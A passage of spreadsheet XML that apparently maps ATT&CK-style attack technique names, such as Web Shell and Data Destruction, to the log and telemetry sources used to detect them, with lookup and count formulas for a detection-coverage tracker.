      <c r="F262" s="13"/>
      <c r="G262" s="53" t="str">
        <f>VLOOKUP(A262,'REF-DataSources'!A:B,2)</f>
        <v>Environmental Keying</v>
      </c>
    </row>
    <row r="263" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A263" s="55" t="s">
        <v>351</v>
      </c>
      <c r="B263" s="17" t="str">
        <f>LOOKUP(A263,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C263" s="17" t="s">
        <v>352</v>
      </c>
      <c r="D263" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E263" s="17">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F263" s="13"/>
      <c r="G263" s="53" t="str">
        <f>VLOOKUP(A263,'REF-DataSources'!A:B,2)</f>
        <v>Domain Trust Discovery</v>
      </c>
    </row>
    <row r="264" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A264" s="55" t="s">
        <v>355</v>
      </c>
      <c r="B264" s="17" t="str">
        <f>LOOKUP(A264,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C264" s="17">
        <v>100</v>
      </c>
      <c r="D264" s="17">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E264" s="17">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F264" s="13"/>
      <c r="G264" s="53" t="str">
        <f>VLOOKUP(A264,'REF-DataSources'!A:B,2)</f>
        <v>Group Policy Modification</v>
      </c>
    </row>
    <row r="265" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A265" s="55" t="s">
        <v>356</v>
      </c>
      <c r="B265" s="17" t="str">
        <f>LOOKUP(A265,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C265" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D265" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E265" s="17">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F265" s="13"/>
      <c r="G265" s="53" t="str">
        <f>VLOOKUP(A265,'REF-DataSources'!A:B,2)</f>
        <v>Data Destruction</v>
      </c>
    </row>
    <row r="266" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A266" s="55" t="s">
        <v>357</v>
      </c>
      <c r="B266" s="17" t="str">
        <f>LOOKUP(A266,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C266" s="17" t="s">
        <v>358</v>
      </c>
      <c r="D266" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E266" s="17">
        <f t="shared" ref="E266:E329" si="10">LEN(TRIM(C266))-LEN(SUBSTITUTE(TRIM(C266),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F266" s="13"/>
      <c r="G266" s="53" t="str">
        <f>VLOOKUP(A266,'REF-DataSources'!A:B,2)</f>
        <v>Data Encrypted for Impact</v>
      </c>
    </row>
    <row r="267" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A267" s="53" t="s">
        <v>361</v>
      </c>
      <c r="B267" s="17" t="str">
        <f>LOOKUP(A267,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
      <c r="C267" s="17"/>
      <c r="D267" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E267" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="F267" s="13"/>
      <c r="G267" s="53" t="str">
        <f>VLOOKUP(A267,'REF-DataSources'!A:B,2)</f>
        <v>Service Stop</v>
      </c>
    </row>
    <row r="268" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A268" s="55" t="s">
        <v>362</v>
      </c>
      <c r="B268" s="17" t="str">
        <f>LOOKUP(A268,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C268" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D268" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E268" s="17">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="G268" s="53" t="str">
        <f>VLOOKUP(A268,'REF-DataSources'!A:B,2)</f>
        <v>Inhibit System Recovery</v>
      </c>
    </row>
    <row r="269" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A269" s="55" t="s">
        <v>363</v>
      </c>
      <c r="B269" s="17" t="str">
        <f>LOOKUP(A269,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Web application firewall logs,Web logs,Packet capture</v>
      </c>
      <c r="C269" s="17" t="s">
        <v>134</v>
      </c>
      <c r="D269" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E269" s="17">
        <f t="shared" si="10"/>
        <v>4</v>
      </c>
      <c r="G269" s="53" t="str">
        <f>VLOOKUP(A269,'REF-DataSources'!A:B,2)</f>
        <v>Defacement</v>
      </c>
    </row>
    <row r="270" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A270" s="53" t="s">
        <v>1725</v>
      </c>
      <c r="B270" s="17" t="str">
        <f>LOOKUP(A270,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C270" s="17"/>
      <c r="D270" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E270" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G270" s="53" t="str">
        <f>VLOOKUP(A270,'REF-DataSources'!A:B,2)</f>
        <v>Internal Defacement</v>
      </c>
    </row>
    <row r="271" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A271" s="53" t="s">
        <v>1730</v>
      </c>
      <c r="B271" s="17" t="str">
        <f>LOOKUP(A271,'REF-DataSources'!A:C)</f>
        <v>Web logs,Web application firewall logs,Packet capture</v>
      </c>
      <c r="C271" s="17"/>
      <c r="D271" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E271" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G271" s="53" t="str">
        <f>VLOOKUP(A271,'REF-DataSources'!A:B,2)</f>
        <v>External Defacement</v>
      </c>
    </row>
    <row r="272" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A272" s="55" t="s">
        <v>367</v>
      </c>
      <c r="B272" s="17" t="str">
        <f>LOOKUP(A272,'REF-DataSources'!A:C)</f>
        <v>BIOS,Component firmware</v>
      </c>
      <c r="C272" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D272" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E272" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G272" s="53" t="str">
        <f>VLOOKUP(A272,'REF-DataSources'!A:B,2)</f>
        <v>Firmware Corruption</v>
      </c>
    </row>
    <row r="273" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A273" s="53" t="s">
        <v>368</v>
      </c>
      <c r="B273" s="17" t="str">
        <f>LOOKUP(A273,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Process use of network,Process monitoring,Network protocol analysis,Network device logs</v>
      </c>
      <c r="C273" s="17"/>
      <c r="D273" s="17">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E273" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G273" s="53" t="str">
        <f>VLOOKUP(A273,'REF-DataSources'!A:B,2)</f>
        <v>Resource Hijacking</v>
      </c>
    </row>
    <row r="274" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A274" s="55" t="s">
        <v>370</v>
      </c>
      <c r="B274" s="17" t="str">
        <f>LOOKUP(A274,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C274" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D274" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E274" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G274" s="53" t="str">
        <f>VLOOKUP(A274,'REF-DataSources'!A:B,2)</f>
        <v>Virtualization/Sandbox Evasion</v>
      </c>
    </row>
    <row r="275" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A275" s="55" t="s">
        <v>1747</v>
      </c>
      <c r="B275" s="17" t="str">
        <f>LOOKUP(A275,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C275" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D275" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E275" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G275" s="53" t="str">
        <f>VLOOKUP(A275,'REF-DataSources'!A:B,2)</f>
        <v>System Checks</v>
      </c>
    </row>
    <row r="276" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A276" s="55" t="s">
        <v>1752</v>
      </c>
      <c r="B276" s="17" t="str">
        <f>LOOKUP(A276,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process use of network</v>
      </c>
      <c r="C276" s="17" t="s">
        <v>166</v>
      </c>
      <c r="D276" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E276" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G276" s="53" t="str">
        <f>VLOOKUP(A276,'REF-DataSources'!A:B,2)</f>
        <v>User Activity Based Checks</v>
      </c>
    </row>
    <row r="277" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A277" s="55" t="s">
        <v>1758</v>
      </c>
      <c r="B277" s="17" t="str">
        <f>LOOKUP(A277,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C277" s="17" t="s">
        <v>122</v>
      </c>
      <c r="D277" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E277" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G277" s="53" t="str">
        <f>VLOOKUP(A277,'REF-DataSources'!A:B,2)</f>
        <v>Time Based Evasion</v>
      </c>
    </row>
    <row r="278" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A278" s="55" t="s">
        <v>371</v>
      </c>
      <c r="B278" s="17" t="str">
        <f>LOOKUP(A278,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C278" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D278" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E278" s="17">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="G278" s="53" t="str">
        <f>VLOOKUP(A278,'REF-DataSources'!A:B,2)</f>
        <v>Network Denial of Service</v>
      </c>
    </row>
    <row r="279" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A279" s="55" t="s">
        <v>1768</v>
      </c>
      <c r="B279" s="17" t="str">
        <f>LOOKUP(A279,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C279" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D279" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E279" s="17">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="G279" s="53" t="str">
        <f>VLOOKUP(A279,'REF-DataSources'!A:B,2)</f>
        <v>Direct Network Flood</v>
      </c>
    </row>
    <row r="280" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A280" s="55" t="s">
        <v>1772</v>
      </c>
      <c r="B280" s="17" t="str">
        <f>LOOKUP(A280,'REF-DataSources'!A:C)</f>
        <v>Sensor health and status,Network protocol analysis,Netflow/Enclave netflow,Network intrusion detection system,Network device logs</v>
      </c>
      <c r="C280" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D280" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E280" s="17">
        <f t="shared" si="10"/>
        <v>5</v>
      </c>
      <c r="G280" s="53" t="str">
        <f>VLOOKUP(A280,'REF-DataSources'!A:B,2)</f>
        <v>Reflection Amplification</v>
      </c>
    </row>
    <row r="281" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A281" s="55" t="s">
        <v>372</v>
      </c>
      <c r="B281" s="17" t="str">
        <f>LOOKUP(A281,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,Web logs,Web application firewall logs,Network intrusion detection system,Network protocol analysis,Network device logs,Netflow/Enclave netflow</v>
      </c>
      <c r="C281" s="17" t="s">
        <v>373</v>
      </c>
      <c r="D281" s="17">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E281" s="17">
        <f t="shared" si="10"/>
        <v>7</v>
      </c>
      <c r="G281" s="53" t="str">
        <f>VLOOKUP(A281,'REF-DataSources'!A:B,2)</f>
        <v>Endpoint Denial of Service</v>
      </c>
    </row>
    <row r="282" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A282" s="53" t="s">
        <v>1781</v>
      </c>
      <c r="B282" s="17" t="str">
        <f>LOOKUP(A282,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Netflow/Enclave netflow,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C282" s="17"/>
      <c r="D282" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E282" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G282" s="53" t="str">
        <f>VLOOKUP(A282,'REF-DataSources'!A:B,2)</f>
        <v>OS Exhaustion Flood</v>
      </c>
    </row>
    <row r="283" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A283" s="53" t="s">
        <v>1786</v>
      </c>
      <c r="B283" s="17" t="str">
        <f>LOOKUP(A283,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C283" s="17"/>
      <c r="D283" s="17">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E283" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G283" s="53" t="str">
        <f>VLOOKUP(A283,'REF-DataSources'!A:B,2)</f>
        <v>Service Exhaustion Flood</v>
      </c>
    </row>
    <row r="284" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A284" s="53" t="s">
        <v>1790</v>
      </c>
      <c r="B284" s="17" t="str">
        <f>LOOKUP(A284,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C284" s="17"/>
      <c r="D284" s="17">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E284" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G284" s="53" t="str">
        <f>VLOOKUP(A284,'REF-DataSources'!A:B,2)</f>
        <v>Application Exhaustion Flood</v>
      </c>
    </row>
    <row r="285" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A285" s="53" t="s">
        <v>1795</v>
      </c>
      <c r="B285" s="17" t="str">
        <f>LOOKUP(A285,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Network intrusion detection system,Web application firewall logs,Web logs,SSL/TLS inspection</v>
      </c>
      <c r="C285" s="17"/>
      <c r="D285" s="17">
        <f t="shared" si="9"/>
        <v>5</v>
      </c>
      <c r="E285" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G285" s="53" t="str">
        <f>VLOOKUP(A285,'REF-DataSources'!A:B,2)</f>
        <v>Application or System Exploitation</v>
      </c>
    </row>
    <row r="286" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A286" s="53" t="s">
        <v>379</v>
      </c>
      <c r="B286" s="17" t="str">
        <f>LOOKUP(A286,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process monitoring,File monitoring,Application logs</v>
      </c>
      <c r="C286" s="17"/>
      <c r="D286" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E286" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G286" s="53" t="str">
        <f>VLOOKUP(A286,'REF-DataSources'!A:B,2)</f>
        <v>Server Software Component</v>
      </c>
    </row>
    <row r="287" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A287" s="55" t="s">
        <v>1804</v>
      </c>
      <c r="B287" s="17" t="str">
        <f>LOOKUP(A287,'REF-DataSources'!A:C)</f>
        <v>Application logs</v>
      </c>
      <c r="C287" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D287" s="17">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="E287" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G287" s="53" t="str">
        <f>VLOOKUP(A287,'REF-DataSources'!A:B,2)</f>
        <v>SQL Stored Procedures</v>
      </c>
    </row>
    <row r="288" spans="1:7" hidden="1" x14ac:dyDescent="0.2">
      <c r="A288" s="55" t="s">
        <v>1809</v>
      </c>
      <c r="B288" s="17" t="str">
        <f>LOOKUP(A288,'REF-DataSources'!A:C)</f>
        <v>Application logs,File monitoring</v>
      </c>
      <c r="C288" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D288" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E288" s="17">
        <f t="shared" si="10"/>
        <v>2</v>
      </c>
      <c r="G288" s="53" t="str">
        <f>VLOOKUP(A288,'REF-DataSources'!A:B,2)</f>
        <v>Transport Agent</v>
      </c>
    </row>
    <row r="289" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A289" s="53" t="s">
        <v>1815</v>
      </c>
      <c r="B289" s="17" t="str">
        <f>LOOKUP(A289,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Netflow/Enclave netflow,File monitoring,Authentication logs</v>
      </c>
      <c r="C289" s="17"/>
      <c r="D289" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E289" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G289" s="53" t="str">
        <f>VLOOKUP(A289,'REF-DataSources'!A:B,2)</f>
        <v>Web Shell</v>
      </c>
    </row>
    <row r="290" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A290" s="53" t="s">
        <v>382</v>
      </c>
      <c r="B290" s="17" t="str">
        <f>LOOKUP(A290,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C290" s="17"/>
      <c r="D290" s="17">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E290" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G290" s="53" t="str">
        <f>VLOOKUP(A290,'REF-DataSources'!A:B,2)</f>
        <v>Software Discovery</v>
      </c>
    </row>
    <row r="291" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A291" s="53" t="s">
        <v>1824</v>
      </c>
      <c r="B291" s="17" t="str">
        <f>LOOKUP(A291,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C291" s="17"/>
      <c r="D291" s="17">
        <f t="shared" si="9"/>
        <v>6</v>
      </c>
      <c r="E291" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G291" s="53" t="str">
        <f>VLOOKUP(A291,'REF-DataSources'!A:B,2)</f>
        <v>Security Software Discovery</v>
      </c>
    </row>
    <row r="292" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A292" s="53" t="s">
        <v>385</v>
      </c>
      <c r="B292" s="17" t="str">
        <f>LOOKUP(A292,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Asset management</v>
      </c>
      <c r="C292" s="17"/>
      <c r="D292" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E292" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G292" s="53" t="str">
        <f>VLOOKUP(A292,'REF-DataSources'!A:B,2)</f>
        <v>Implant Container Image</v>
      </c>
    </row>
    <row r="293" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A293" s="53" t="s">
        <v>386</v>
      </c>
      <c r="B293" s="17" t="str">
        <f>LOOKUP(A293,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C293" s="17"/>
      <c r="D293" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E293" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G293" s="53" t="str">
        <f>VLOOKUP(A293,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Service Discovery</v>
      </c>
    </row>
    <row r="294" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A294" s="53" t="s">
        <v>388</v>
      </c>
      <c r="B294" s="17" t="str">
        <f>LOOKUP(A294,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,OAuth audit logs</v>
      </c>
      <c r="C294" s="17"/>
      <c r="D294" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E294" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G294" s="53" t="str">
        <f>VLOOKUP(A294,'REF-DataSources'!A:B,2)</f>
        <v>Steal Application Access Token</v>
      </c>
    </row>
    <row r="295" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A295" s="53" t="s">
        <v>389</v>
      </c>
      <c r="B295" s="17" t="str">
        <f>LOOKUP(A295,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C295" s="17"/>
      <c r="D295" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E295" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G295" s="53" t="str">
        <f>VLOOKUP(A295,'REF-DataSources'!A:B,2)</f>
        <v>System Shutdown/Reboot</v>
      </c>
    </row>
    <row r="296" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A296" s="53" t="s">
        <v>390</v>
      </c>
      <c r="B296" s="17" t="str">
        <f>LOOKUP(A296,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C296" s="17"/>
      <c r="D296" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E296" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G296" s="53" t="str">
        <f>VLOOKUP(A296,'REF-DataSources'!A:B,2)</f>
        <v>Data from Cloud Storage Object</v>
      </c>
    </row>
    <row r="297" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A297" s="53" t="s">
        <v>391</v>
      </c>
      <c r="B297" s="17" t="str">
        <f>LOOKUP(A297,'REF-DataSources'!A:C)</f>
        <v>Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C297" s="17"/>
      <c r="D297" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E297" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G297" s="53" t="str">
        <f>VLOOKUP(A297,'REF-DataSources'!A:B,2)</f>
        <v>Account Access Removal</v>
      </c>
    </row>
    <row r="298" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A298" s="53" t="s">
        <v>392</v>
      </c>
      <c r="B298" s="17" t="str">
        <f>LOOKUP(A298,'REF-DataSources'!A:C)</f>
        <v>SSL/TLS inspection,DNS records,Anti-virus,Web proxy,File monitoring,Mail server,Office 365 trace logs</v>
      </c>
      <c r="C298" s="17"/>
      <c r="D298" s="17">
        <f t="shared" si="9"/>
        <v>7</v>
      </c>
      <c r="E298" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G298" s="53" t="str">
        <f>VLOOKUP(A298,'REF-DataSources'!A:B,2)</f>
        <v>Internal Spearphishing</v>
      </c>
    </row>
    <row r="299" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A299" s="53" t="s">
        <v>393</v>
      </c>
      <c r="B299" s="17" t="str">
        <f>LOOKUP(A299,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C299" s="17"/>
      <c r="D299" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E299" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G299" s="53" t="str">
        <f>VLOOKUP(A299,'REF-DataSources'!A:B,2)</f>
        <v>Unused/Unsupported Cloud Regions</v>
      </c>
    </row>
    <row r="300" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A300" s="53" t="s">
        <v>396</v>
      </c>
      <c r="B300" s="17" t="str">
        <f>LOOKUP(A300,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="C300" s="17"/>
      <c r="D300" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E300" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G300" s="53" t="str">
        <f>VLOOKUP(A300,'REF-DataSources'!A:B,2)</f>
        <v>Transfer Data to Cloud Account</v>
      </c>
    </row>
    <row r="301" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A301" s="53" t="s">
        <v>397</v>
      </c>
      <c r="B301" s="17" t="str">
        <f>LOOKUP(A301,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Azure activity logs,Stackdriver logs,AWS CloudTrail logs</v>
      </c>
      <c r="C301" s="17"/>
      <c r="D301" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E301" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G301" s="53" t="str">
        <f>VLOOKUP(A301,'REF-DataSources'!A:B,2)</f>
        <v>Cloud Service Dashboard</v>
      </c>
    </row>
    <row r="302" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A302" s="53" t="s">
        <v>399</v>
      </c>
      <c r="B302" s="17" t="str">
        <f>LOOKUP(A302,'REF-DataSources'!A:C)</f>
        <v>File monitoring,API monitoring</v>
      </c>
      <c r="C302" s="17"/>
      <c r="D302" s="17">
        <f t="shared" si="9"/>
        <v>2</v>
      </c>
      <c r="E302" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G302" s="53" t="str">
        <f>VLOOKUP(A302,'REF-DataSources'!A:B,2)</f>
        <v>Steal Web Session Cookie</v>
      </c>
    </row>
    <row r="303" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A303" s="53" t="s">
        <v>1877</v>
      </c>
      <c r="B303" s="17" t="str">
        <f>LOOKUP(A303,'REF-DataSources'!A:C)</f>
        <v>VBR,MBR,Component firmware,Process monitoring,Disk forensics,EFI,BIOS,API monitoring</v>
      </c>
      <c r="C303" s="17"/>
      <c r="D303" s="17">
        <f t="shared" si="9"/>
        <v>8</v>
      </c>
      <c r="E303" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G303" s="53" t="str">
        <f>VLOOKUP(A303,'REF-DataSources'!A:B,2)</f>
        <v>Pre-OS Boot</v>
      </c>
    </row>
    <row r="304" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A304" s="53" t="s">
        <v>1884</v>
      </c>
      <c r="B304" s="17" t="str">
        <f>LOOKUP(A304,'REF-DataSources'!A:C)</f>
        <v>EFI,BIOS,API monitoring</v>
      </c>
      <c r="C304" s="17"/>
      <c r="D304" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E304" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G304" s="53" t="str">
        <f>VLOOKUP(A304,'REF-DataSources'!A:B,2)</f>
        <v>System Firmware</v>
      </c>
    </row>
    <row r="305" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A305" s="53" t="s">
        <v>1891</v>
      </c>
      <c r="B305" s="17" t="str">
        <f>LOOKUP(A305,'REF-DataSources'!A:C)</f>
        <v>Component firmware,Process monitoring,Disk forensics,API monitoring</v>
      </c>
      <c r="C305" s="17"/>
      <c r="D305" s="17">
        <f t="shared" si="9"/>
        <v>4</v>
      </c>
      <c r="E305" s="17">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="G305" s="53" t="str">
        <f>VLOOKUP(A305,'REF-DataSources'!A:B,2)</f>
        <v>Component Firmware</v>
      </c>
    </row>
    <row r="306" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A306" s="53" t="s">
        <v>1896</v>
      </c>
      <c r="B306" s="17" t="str">
        <f>LOOKUP(A306,'REF-DataSources'!A:C)</f>
        <v>VBR,MBR,API monitoring</v>
      </c>
      <c r="C306" s="17"/>
      <c r="D306" s="17">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="E306" s="17">
